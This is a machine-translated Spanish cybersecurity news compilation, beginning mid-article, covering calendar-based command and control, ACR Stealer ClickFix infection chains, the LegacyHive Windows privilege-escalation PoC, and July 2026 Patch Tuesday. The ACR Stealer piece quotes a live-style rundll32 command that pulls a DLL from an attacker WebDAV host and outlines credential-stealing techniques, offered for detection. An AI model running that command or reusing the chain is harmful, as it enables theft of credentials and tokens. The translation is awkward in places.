Los consejos de detección de Group-IB se basan en los propios hábitos del malware y las señales más claras se encuentran en el propio calendario. Busque eventos que lleven:

  • una fecha en el futuro lejano, específicamente 2050-05-13;
  • un asunto que es un GUID simple o que coincide con el del operador Event ID: o Boss{..}ID{..} denominación;
  • archivos adjuntos nombrados File{n}.txt.

Por el lado de la identidad, la firma recomienda restringir y auditar las aplicaciones OAuth de credenciales de cliente que pueden llegar a Graph y alertar sobre secretos de clientes recién creados, además de la higiene habitual de Entra ID de acceso condicional, rotación de credenciales y detección de tokens anómalos.

Ciberseguridad

Para la detección, audite Microsoft Graph y la actividad del buzón para detectar cambios en el calendario impulsados ​​por la aplicación: eventos creados, archivos adjuntos cargados o asuntos cuyo nombre cambió por una aplicación en lugar de una persona. Mire también el DNS, para consultas AAAA inusualmente frecuentes y subdominios largos y de alta entropía dirigidos a un solo dominio. cazando para cloudlanecdn[.]com y el logAzure.txt El archivo de configuración es el primer paso rápido, y el conjunto completo de indicadores, incluidos los hashes de archivos, se encuentra en el informe de Group-IB.

Ocultar comando y control en servicios confiables de Microsoft es no nuevo; los atacantes ya lo han ejecutado a través de las bandejas de entrada de Outlook, carpetas de borradores y OneDrive. Los acontecimientos estacionados en 2050, donde nadie mira, son simplemente los últimos puntos que los defensores no tenían motivos para inspeccionar. El operador aún no tiene nombre, y el tráfico de víctimas fluía apenas el 9 de julio, lo que hace que valga la pena echar un vistazo a esas entradas del calendario del futuro lejano.

ACR Stealer utiliza señuelos ClickFix para robar tokens del navegador y archivos de Microsoft 365 – CYBERDEFENSA.MX

ACR Stealer, un ladrón de información en circulación desde 2024, está saliendo de las redes empresariales con contraseñas de navegador guardadas, tokens de sesión en vivo, archivos PDF, documentos de Microsoft 365 y archivos de carpetas sincronizadas de OneDrive y SharePoint.

Entra porque alguien pegó un comando en un cuadro Ejecutar y presionó Enter. microsoft establecido dos de las cadenas de entrega el jueves. Su equipo Defender Experts, el brazo de detección administrado de la compañía, había observado el aumento de la actividad de ACR Stealer en los entornos de los clientes desde finales de abril hasta mediados de junio, y dice que las campañas están «utilizando con éxito señuelos ClickFix para robar credenciales de navegador, tokens de autenticación y documentos confidenciales».

Ambas cadenas se abren con el mismo mensaje y luego se dividen: una deja rastros en el disco, la otra se ejecuta casi por completo en la memoria. La guía de remediación de Microsoft les dice a las víctimas que revoquen los tokens, no solo que roten las contraseñas.

Una carga útil en los píxeles

El mensaje probablemente llegue a través de publicidad maliciosa o resultados de búsqueda manipulados por SEO, según el informe. La cadena sin archivos comienza cuando se genera el comando pegado mshta.exe para extraer contenido HTA remoto. Un cargador de VBScript integrado se apoya en objetos COM para decodificar y activar PowerShell; esa etapa genera una identificación de víctima, deshabilita la validación de certificados y ejecuta lo que recupera en la memoria.

Lo que recupera es un JPEG de un servidor de imágenes, con la carga útil en los píxeles. Las rutinas personalizadas lo crean, lo descifran, lo descomprimen y lo ejecutan de manera reflexiva. Luego va por Chrome y Edge, leyendo el Login Data y Web Data bases de datos e invocar DPAPI para descifrar las contraseñas, cookies y tokens que contienen. Los archivos PDF en el escritorio y en Descargas también van.

El 26 de mayo, Brad Duncan, responsable del SANS Internet Storm Center documentó una infección de Windows rastreó hasta una página que se hacía pasar por Claude, el asistente de inteligencia artificial de Anthropic, a la que se accedía a través de anuncios maliciosos de Google y que a menudo se escondía detrás sites.google.com URL. La página ofrecía instrucciones de macOS cuando se abría en una Mac y instrucciones de Windows cuando se abría en Windows.

Ciberseguridad

Microsoft nunca nombra el señuelo. Dos de los indicadores de su tabla de la Campaña 2, creativecommunityinfo[.]art y enhanceblabber[.]ccfiguran como host de carga útil y C2. The Hacker News comparó ambos con la cadena de Duncan, que recorría los subdominios de cada uno siete semanas antes, y el informe de Microsoft cita su diario entre las referencias.

Esa cadena también sacó un JPEG de 628 KB de ImgBB, un servicio de alojamiento de imágenes. Lo marcó como parte de la infección y no obtuvo nada: «tampoco pude encontrar ningún signo evidente de datos incrustados».

canario rojo había registrado señuelos de la marca Claude un mes antes, entregando ACR Stealer a través de páginas falsas de Claude Code en GitLab, como claude-desktop[.]gitlab[.]io.

La otra cadena deja huellas

La primera cadena de Microsoft escribe en el disco, lo que deja a los defensores más con qué trabajar. El comando pegado extrae una DLL directamente de un recurso compartido WebDAV a través de HTTPS, utilizando un directorio GUID y un nombre de archivo creado para pasar como otra cosa; el ejemplo del informe es google.ct.

Red Canary publicó la misma forma en su informe de mayo, a partir de la telemetría de abril, semanas antes del artículo de Microsoft:

"C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

Dos de las tres variantes que Defender Experts vio utilizar pushd Primero debe montar el recurso compartido remoto como una unidad local temporal, de modo que la carga útil se ejecute a través de lo que parece una ruta local. El más sigiloso envuelve eso en conhost.exe --headless para cerrar la ventana de la consola y oculta las cadenas para pushd, rundll32y el host remoto detrás de la expansión retrasada de las variables de entorno.

Lo que sigue es PowerShell ofuscado. Coloca un ZIP en una carpeta debajo %LocalAppData%\Temp con un nombre inofensivo; El ejemplo de Microsoft es LogiOptionsPlus. un paquete pythonw.exe luego inicia el script Python, por lo que no aparece nada en la pantalla. El instalador borra las copias más antiguas antes de realizar la instalación, lo que lo convierte en un actualizador.

Persiste a través de una tarea programada oculta que se hace pasar por una actualización de software, copia marcas de tiempo notepad.exe en sus propios archivos y borra el historial de PowerShell detrás de él. La última etapa permanece en la memoria y se ejecuta a través de la API de Windows Fiber.

En un subconjunto de estas intrusiones, un segundo cargador de Python se comunica con los puntos finales RPC públicos de blockchain y la infraestructura de nodos Web3, probablemente extrayendo una carga útil o una dirección C2 de un libro de contabilidad público. Microsoft llama a la técnica EtherHiding: coloque el puntero en un contrato inteligente y no quedará ningún solucionador controlado por el atacante que aprovechar.

Sin errores, sin números

Ninguna cadena explota una vulnerabilidad. Ambos heredan exactamente lo que el usuario que inició sesión ya tiene, y cada capa posterior, el montaje WebDAV, la extracción de píxeles y la transferencia en memoria, solo se ejecuta porque una persona leyó un mensaje y presionó Enter. No hay CVE en esta historia. La aplicación de parches no elimina la ruta de pegar y ejecutar.

Microsoft dice que los señuelos están funcionando, pero nunca lo cuantifica. El informe no proporciona un recuento de víctimas, ni un número de clientes afectados, ni una base de referencia para el aumento que informa.

La telemetría de abril de Red Canary al menos tiene números. ClearFake, un clúster de inyección web que ha estado alimentando a ACR Stealer desde al menos marzo de 2025, ocupó el puesto número uno en su lista de amenazas más frecuentes por primera vez ese mes, y ACR Stealer entró entre los diez primeros empatando en el sexto lugar.

Ciberseguridad

El clúster se entrega a través de JavaScript inyectado en sitios comprometidos y el informe de Microsoft no lo menciona en ninguna de las cadenas.

¿De quién es este ladrón?

Microsoft tiene cuidado con lo que afirma. Vincula la actividad con ACR Stealer según el comportamiento observado y el arte posterior a la explotación, se compara con lo que se sabe públicamente sobre la infraestructura de la familia y no nombra ningún actor de amenaza. La precaución se gana.

ACR, también escrito como AcridRain, fue comercializado en foros de habla rusa por un actor conocido como SheldIO, que cerró las ventas en julio de 2024. Las cuentas se dividieron sobre lo que sucedió después. eSentire dice que el código fuente se vendió. El relato de Proofpoint difiere: el mismo canal de Telegram anunció el cierre, no un adiós del equipo, y el panel de Amatera apareció cinco meses después.

En cuanto al cambio de marca, están de acuerdo. Punto de prueba reportado en junio de 2025 que «ACR Stealer fue significativamente actualizado y renombrado como Amatera Stealer», con un precio de $199 por mes a $1,499 por año. Red Canary trata a ACR y Amatera como una familia y evalúa al propio ACR como un GrMsk Stealer actualizado.

Una detección de julio de 2026 denominada ACR Stealer es una llamada de comportamiento en una base de código cuyo nombre ha cambiado al menos una vez y puede haber cambiado de propietario. La etiqueta describe el código. No te dice quién lo dirige.

donde detenerlo

Un control se encuentra antes de cada técnica anterior: ninguna cadena se ejecuta sin que un usuario pegue un comando en el cuadro de diálogo Ejecutar.

  • Corta el vector. eSentire recomienda eliminar el mensaje Ejecutar a través de GPO y bloquear mshta.exe a través de AppLocker o WDAC.
  • Utilice reglas de control de aplicaciones y reducción de la superficie de ataque para que PowerShell, Python, mshta.exey rundll32.exe no puede iniciar contenido entregado por Internet desde Downloads, Tempo %LocalAppData%.
  • Caza rundll32.exe ejecutándose sin parámetros de línea de comando mientras se establece una conexión de red, que es la oportunidad de detección de Red Canary para esta familia. Agregue tareas programadas que se hacen pasar por actualizaciones de software, tiempos de espera y borrado del historial de PowerShell.
  • En un host sospechoso, aísle, rote credenciales, revoque tokens y verifique las conexiones salientes a recursos compartidos remotos y servicios de alojamiento de imágenes.

Microsoft envió tres consultas de búsqueda de Defender XDR y 16 dominios de campaña con el informe.

Esos indicadores son una porción, y el informe así lo dice: representativos, no el rango completo de la familia, con más campañas e infraestructura probablemente activas. Los dominios rotan. La pregunta en el frente no, porque funciona. Los señuelos se superponen en lugar de reemplazarse: Red Canary vio CAPTCHA falsos y páginas de Claude falsas en la misma telemetría de abril.

Un investigador lanza una nueva PoC de día cero para Windows horas después del parche de Microsoft el martes – CYBERDEFENSA.MX

investigador de seguridad Eclipse caótico (también conocido como Pesadilla-Eclipse) tiene liberado un nuevo exploit de prueba de concepto (PoC) llamado LegacyHive.

Se ha descrito como una vulnerabilidad de elevación de privilegios de carga de colmena arbitraria del Servicio de perfiles de usuario de Windows. El Servicio de perfiles de usuario de Windows, también conocido como ProfSvc, es un componente central del sistema que administra entornos y cuentas de usuario.

«La PoC requiere otra credencial de usuario estándar y un tercer nombre de usuario (que puede ser una cuenta de administrador)», Chaotic Eclipse dicho. «Si la prueba de concepto tiene éxito, terminará montando la colmena de usuarios de destino en la raíz de clases de usuarios actuales».

El investigador dijo que el exploit fue eliminado para evitar la explotación pública, añadiendo que el exploit original no requería credenciales de usuario adicionales y no se limitaba a la colmena «usrclass.dat».

«Cualquier colmena podría cargarse utilizando esta vulnerabilidad, pero se necesitarían algunas células cerebrales para que el PoC lo hiciera», señaló el investigador.

Lo que lo hace notable es que es funcional en todas las versiones de escritorio y servidor compatibles de Windows, incluidas aquellas que ejecutan la última actualización del martes de parches de julio de 2026.

Ciberseguridad

Chaotic Eclipse y Microsoft han estado envueltos en una acalorada disputa desde al menos abril de 2026, y el investigador publicó detalles de múltiples exploits antes de que el fabricante de Windows tuviera la oportunidad de parchearlos, citando una falla en la comunicación. Tres de las vulnerabilidades de Microsoft Defender fueron explotadas activamente poco después de su divulgación pública.

A principios de este mes, el gigante tecnológico publicó actualizaciones de seguridad para otra vulnerabilidad de Defender conocida como RoguePlanet que fue revelada por el investigador. Sin embargo, resultó que las «actualizaciones de defensa en profundidad» recientemente introducidas para abordar la falla pueden hacer que Microsoft Defender filtre 8 bytes de datos al intentar abrir un archivo en ciertos escenarios.

microsoft le dijo a The Hacker News que está investigando el nuevo informe. Nos hemos puesto en contacto con la empresa para hacer comentarios sobre LegacyHive y actualizaremos la historia si recibimos una respuesta.

Fallas del servidor SharePoint en primer plano

El desarrollo se produce cuando Microsoft envió parches para un récord de 622 fallas, incluidas dos deficiencias de escalada de privilegios en SharePoint Server (CVE-2026-56164, puntuación CVSS: 5.3) y Servicios de federación de Active Directory (CVE-2026-56155, puntuación CVSS: 7.8) que han sido marcadas como explotadas activamente.

La Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) ha agregado ambas vulnerabilidades a sus vulnerabilidades explotadas conocidas (KEV), que exige que las agencias del Poder Ejecutivo Civil Federal (FCEB) apliquen las correcciones antes del 17 y 28 de julio de 2026, respectivamente.

«Después de años de relativa estabilidad, el proceso del martes de parches ha experimentado turbulencias significativas en lo que va de 2026», dijo en un comunicado Adam Barnett, ingeniero jefe de software de Rapid7. «Además del crecimiento exponencial de los informes y descubrimiento de vulnerabilidades impulsado por la IA, Microsoft está lidiando con el surgimiento de una serie de vulnerabilidades reveladas de tal manera que generan la máxima incomodidad para Redmond».

En un aviso separado, la agencia dicho es consciente de la explotación activa de múltiples fallas de SharePoint Server, incluyendo CVE-2026-32201, CVE-2026-45659y CVE-2026-56164, que permiten a los actores de amenazas cibernéticas obtener acceso no autorizado a instancias susceptibles.

Ciberseguridad

«Estas vulnerabilidades afectan a todas las versiones locales compatibles de SharePoint Server (Subscription Edition, 2019 y 2016) e implican el establecimiento de ejecución remota de código (RCE) y actividades posteriores a la explotación, como el robo de claves de máquina de Internet Information Services (IIS) y la realización de técnicas de deserialización, para ganar persistencia e implementar malware», dijo CISA.

«La falla surge de la falta de autenticación para una función crítica, lo que permite a un atacante alcanzar una funcionalidad que debería requerir autorización», dijo Alex Vovk, director ejecutivo y cofundador de Action1, sobre CVE-2026-56164.

«Un atacante puede enviar solicitudes de red especialmente diseñadas para acceder a una funcionalidad que debería requerir autenticación, lo que resulta en una escalada de privilegios. La vulnerabilidad impacta principalmente la integridad del sistema al permitir acciones no autorizadas sin requerir autenticación previa o interacción del usuario. Los servidores SharePoint con acceso a Internet están particularmente expuestos porque el ataque se puede realizar de forma remota sin credenciales válidas».

Vale la pena señalar que la actualización de julio de 2026 también aborda otra vulnerabilidad de omisión de característica de seguridad crítica de SharePoint Server (CVE-2026-55040puntuación CVSS: 9,1) que un atacante remoto no autenticado podría aprovechar para eludir la autenticación en un servidor de SharePoint vulnerable y realizar operaciones como usuario o administrador del sitio de SharePoint.

«La vulnerabilidad se debe a varios problemas en el proceso de validación del token JWT», Rapid7 dicho. «Un atacante que explota con éxito CVE-2026-55040 puede realizar operaciones contra el sitio de SharePoint de destino como el usuario que identifica. Además, esta omisión de autenticación se puede encadenar a vulnerabilidades adicionales dentro de la superficie de ataque autenticada del sitio de destino».

Microsoft parchea un récord de 622 fallas, incluidos dos días cero bajo ataque activo – CYBERDEFENSA.MX

Microsoft envió su mayor Martes de parches registrado hoy, y dos de las correcciones cierran agujeros que los atacantes ya están explotando. El lanzamiento cubre 622 de los CVE propios de Microsoft por su Guía de actualización de seguridad conteo, más del triple del máximo anterior de junio de alrededor de 200.

Esos dos insectos vivos son los que hay que atrapar primero. Microsoft le da crédito a los servicios de respuesta a incidentes por ambos. Ambas son fallas de elevación de privilegios en la infraestructura de identidad y colaboración: CVE-2026-56164 en SharePoint Server local y CVE-2026-56155 en Servicios de federación de Active Directory.

Tampoco lo es uno de los llamativos aspectos críticos de la ejecución remota de código. Son errores de privilegios en dos sistemas que importan más de lo que sugieren sus puntuaciones: el almacén de documentos de la empresa y la casilla que firma sus inicios de sesión.

Los dos días cero para parchear primero

CVE-2026-56164una falla de SharePoint Server que, según Microsoft, se está explotando en ataques, permite a un atacante no autenticado escalar privilegios en la red. Sin credenciales, sin interacción del usuario, remoto. Microsoft lo atribuyó a los respondedores de incidentes de Mandiant y al equipo FLARE de Google, lo que apunta a un descubrimiento dentro de ataques activos, aunque Microsoft no ha dicho cómo fue explotado ni por quién.

Si ejecuta SharePoint autohospedado, este es el que debe tomar primero, y hay un segundo reloj: hoy también es el día en que SharePoint Server 2016 y 2019 llegan al final del soporte extendido. A diferencia de Windows Server o SQL Server, ninguno de los dos tiene un programa ESU pago al que recurrir.

Ciberseguridad

Más allá de los parches, el aviso de Microsoft señala que habilitar AMSI en modo completo en el servidor mitiga el ataque. SharePoint ha sido un imán para los atacantes desde que la cadena ToolShell arrasó servidores sin parches en 2025, y no ha dejado de serlo.

CVE-2026-56155una falla de los Servicios de Federación de Active Directory que Microsoft también señala como explotada, permite a un atacante ya autenticado elevar privilegios localmente a través de controles de acceso débiles. La propia unidad de respuesta a incidentes DART de Microsoft se lleva el crédito.

AD FS es la caja que firma los tokens para el resto de los fideicomisos patrimoniales, por lo que una falla etiquetada como «local» en ese host merece más atención de lo que sugiere la etiqueta. Microsoft no ha dicho qué privilegios otorga ni cómo los usaron los atacantes.

Vale la pena saberlo para cualquiera que esté siguiendo los plazos de remediación: ninguno de los CVE está activado Catálogo de vulnerabilidades explotadas conocidas de CISA al momento de escribir este artículo. La propia clasificación de explotabilidad de Microsoft ya marca a ambos como explotados. No espere a que aparezca una lista de KEV para hacerlo oficial.

Microsoft también califica el error de SharePoint con una gravedad bastante baja, lo que es un buen recordatorio de que la etiqueta de gravedad no es lo que hay que clasificar este mes.

Un tercer error y un aterrizaje de la cadena SharePoint en agosto

El tercer día cero se reveló públicamente pero no está bajo ataque: CVE-2026-50661, otro Omisión de BitLocker. Necesita acceso físico al dispositivo, por lo que no es una emergencia remota. Parcheelo, pero no salta la cola. Continúa una serie de omisiones de BitLocker que se remontan a bitskrieg y YellowKey a principios de este año.

SharePoint obtuvo una segunda solución notable. Laboratorios Rapid7 revelados CVE-2026-55040un bypass de autenticación JWT que construyeron para su entrada Pwn2Own Berlin. La puntuación depende de a quién le preguntes: Rapid7 la sitúa en 5,3 y dice que Microsoft le asignó una gravedad media, mientras que ZDI lee el lanzamiento como Crítico en 9.1.

Lo que hace no está en discusión. Rapid7 lo encadenó a un error de ejecución remota de código separado para alcanzar RCE no autenticado contra un servidor vulnerable, y la mitad de RCE aún no está parcheada; Está previsto que Microsoft lo solucione en agosto.

Eso hace que July evite la solución que rompe la cadena. Una diferencia de cuatro puntos sobre un error también le indica cuánto vale un número de gravedad este mes.

La limpieza RC4 que puede interrumpir los inicios de sesión

Esta actualización también finaliza el endurecimiento Kerberos RC4 de varios años de Microsoft. La implementación de julio elimina el interruptor de reversión RC4DefaultDisablementPhase, la trampilla de escape en la que se han apoyado los administradores desde que Microsoft comenzó la ofensiva en enero.

Después de esto, RC4 funciona sólo para cuentas configuradas explícitamente para permitirlo. Si alguna cuenta de servicio en su entorno aún solicita tickets RC4 Kerberos, puede fallar la autenticación en el momento en que llega la actualización.

El orden importa: primero audite, utilizando los eventos de auditoría RC4 que Microsoft agregó en enero, luego rote las contraseñas en las cuentas de servicio marcadas, para que Windows genere claves AES para ellas y luego aplique el parche. La rotación solo corrige las cuentas a las que les faltan claves AES.

Cualquier cosa anclada a RC4 por configuración, o un cliente heredado que no habla nada más, necesita su propia solución antes de que llegue la actualización. Este no te hará violar; Rompe cosas, pero te avisará a las 2 a.m. si te saltas la auditoría.

Por qué un mes tranquilo estableció un récord

Julio es históricamente uno de los meses más livianos en el calendario de Microsoft, lo que hace que un lanzamiento de este tamaño se destaque. Solo Windows representa 416 de los 622, y ZDI cuenta 95 errores de ejecución remota de código en toda la versión.

Aquí es donde se encuentra el resto y lo que vale la pena sacar de cada montón:

Familia de productos CVE vale la pena retirarse
ventanas 416 Tanto el AD FS de día cero (CVE-2026-56155) y la omisión de BitLocker revelada (CVE-2026-50661) vive aquí. La puntuación más alta del lanzamiento es un VMSwitch RCE, CVE-2026-57092 a las 9,9. También cinco RCE de DHCP y 21 errores de controladores NTFS y ReFS que ZDI lee como una causa raíz compartida.
Oficina 82 Contado una vez. Microsoft vuelve a enumerar los mismos 82 en una pista separada de Office 2016, razón por la cual algunos medios informan 164.
Borde de Microsoft 46 ZDI cuenta 21 como propios de Microsoft en lugar de nuevos listados de Chromium.
Herramientas para desarrolladores 27 La característica de seguridad pasa por alto Visual Studio, VS Code y GitHub Copilot, principalmente inyección y recorrido de ruta.
Servidor SharePoint 17 El día cero explotado (CVE-2026-56164) y bypass de cadena de Rapid7 (CVE-2026-55040), más un par RCE crítico que incluye CVE-2026-50522 en 9,8.
Azur 11 Nada marcó como urgente.
Servidor SQL 8 Un par RCE, CVE-2026-54117 y CVE-2026-54118ambos 8,8.
Defensor 5 Dos RCE críticos.
Servidor de intercambio 5 Un XSS almacenado en Outlook Web Access, CVE-2026-55008en 9,6. Microsoft lo cataloga como suplantación de identidad, lo que lo subestima.
Otro 5 Nada marcó como urgente.

Los recuentos provienen de la Guía de actualización de seguridad de Microsoft, que suma un total de 622 CVE únicos este mes. ZDI, contando de forma independiente, llegó a 621, y su revisión de julio es la fuente de las llamadas por familia.

Ciberseguridad

Microsoft llamó a este cinco días antes. en un publicación del 9 de juliodijo a los clientes que esperaran un «mayor volumen de actualizaciones de seguridad incluidas en cada versión de seguridad» a medida que la IA le ayuda a descubrir más problemas. Ese trabajo incluye MDASH, su sistema de escaneo agente multimodelo, que encontró por sí solo 16 de los errores en el martes de parches de mayo. Microsoft no ha dicho cuántos de los 622 de julio salieron de ese proceso.

La misma automatización corta en ambos sentidos. Una vez que se envía un parche, los atacantes pueden compararlo con la última versión, encontrar el error que cierra y crear un exploit que funcione antes de que la mayoría de las tiendas hayan terminado de probar. Eso devora el antiguo colchón de «esperar una semana» y reduce la brecha con Exploit Wednesday.

También destruye la clasificación basada en CVSS. Cuando una versión tiene más de 600 CVE y una gran parte tiene una calificación Alta o Crítica, «crítica» deja de clasificar nada. Los dos errores explotados de este mes lo aclaran: ninguno es un título 9.8, ambos son fallas de privilegios de nivel medio y ambos ya están en uso.

Ordene por qué se está explotando, utilizando KEV, EPSS y el indicador de explotación de Microsoft, no por puntuación, y parchee más rápido que antes. El número en la caja sólo está subiendo.